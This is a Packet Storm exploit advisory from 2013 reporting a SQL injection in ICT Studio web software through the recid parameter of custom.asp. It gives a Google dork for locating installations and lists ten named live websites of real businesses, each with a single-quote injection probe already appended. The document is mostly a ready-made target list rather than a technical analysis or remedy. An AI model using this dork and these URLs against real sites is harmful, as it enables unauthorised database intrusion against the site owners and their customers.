ICT Studio SQL Injection

2013-09-11T00:00:00
ID PACKETSTORM:123198
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-11T00:00:00

Description

                                        
                                            `#**************************************************************  
# [+] Exploit title : ICT Studio Sql injection vulnerability  
#  
# [+] Software link : http://www.ictstudio.ie  
#  
# [+] Exploit Author : Ashiyane Digital Security Team  
#  
# [+] Tested on: Windows 7 , Linux  
#  
# [+] Google Dork : intext:"Powered by ICT Studio"  
#  
# [+] Date: 2013/09/11  
#  
--------------------------------------------------------------------  
# [+] Exploit : Sql Injection  
#  
# [+] Location : [Target]/web/custom.asp?recid=[Sql injection]  
#  
#-------  
# Proof:  
#-------  
#  
# http://www.assisidesign.com/web/custom.asp?recid=1'  
#  
# http://www.bunratty.net/web/custom.asp?recid=1'  
#  
# http://www.biocapcro.com//web/custom.asp?recid=1'  
#  
# http://www.frank-regan.ie/web/custom.asp?recid=1'  
#  
# http://www.jbbourkeheating.ie/web/custom.asp?recid=1'  
#  
# http://www.limerickshow.com/web/custom.asp?recid=1'  
#  
# http://www.vizepropertygroup.com/web/custom.asp?recid=1'  
#  
# http://www.muddyburns.com/web/custom.asp?recid=1'  
#  
# http://www.merlon.ie/web/custom.asp?recid=1'  
#  
# http://www.paneuro.ie/web/custom.asp?recid=1'  
#  
#  
######################  
discovered by : ACC3SS  
######################  
`